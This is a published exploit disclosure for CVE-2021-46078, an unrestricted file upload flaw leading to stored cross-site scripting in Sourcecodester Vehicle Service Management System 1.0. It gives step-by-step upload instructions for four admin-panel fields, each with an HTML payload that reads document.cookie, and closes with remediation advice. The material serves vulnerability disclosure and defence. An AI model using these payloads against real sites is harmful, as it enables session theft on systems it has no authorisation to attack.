Exploit Title: Vehicle Service Management System - 'Multiple' File upload Leads to Stored Cross-Site Scripting
Exploit Author: P.L.Sanu
- https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
- https://nvd.nist.gov/vuln/detail/CVE-2021-46078
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46078
An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.
- Login to the admin panel http://localhost/vehicle_service/admin
- Navigate to My Account section http://localhost/vehicle_service/admin/?page=user
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
- Save the above html code For Ex:XSS.html
- In My Account Section enter all the required details and browse the html file in Avatar.
- Click on update button.
- Open the avatar image in new tab.
- Malicious javascript code triggered.
- Login to the admin panel http://localhost/vehicle_service/admin
- Navigate to User List section and click on Create New button.
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
- Save the above html code For Ex:XSS.html
- In Create New User Page enter all the required details and browse the html file in Avatar.
- Click on Save button.
- Open the avatar image in new tab.
- Malicious javascript code triggered.
- Login to the admin panel http://localhost/vehicle_service/admin
- Navigate to Settings section http://localhost/vehicle_service/admin/?page=system_info
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
- Save the above html code For Ex:XSS.html
- In Settings Section enter all the required details and browse the html file in System Logo.
- Click on update button.
- Open the System Logo image in new tab.
- Malicious javascript code triggered.
- Login to the admin panel http://localhost/vehicle_service/admin
- Navigate to Settings section http://localhost/vehicle_service/admin/?page=system_info
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
- Save the above html code For Ex:XSS.html
- In Settings Section enter all the required details and browse the html file in Website Cover.
- Click on update button.
- Open the Website Cover image in new tab.
- Malicious javascript code triggered.
An attacker can able to upload malicious file in multiple endpoints it leads to Stored Cross-Site Scripting.
It is recommended to implement the following:
- Never accept a filename and its extension directly without having a white-list filter.
- If there is no need to have Unicode characters, it is highly recommended to only accept alpha-numeric characters and only one dot as an input for the file name and the extension.
- Limit the file size to a maximum value in order to prevent denial of service attacks.
- Uploaded directory should not have any "execute" permission.
- Don't rely on client-side validation only.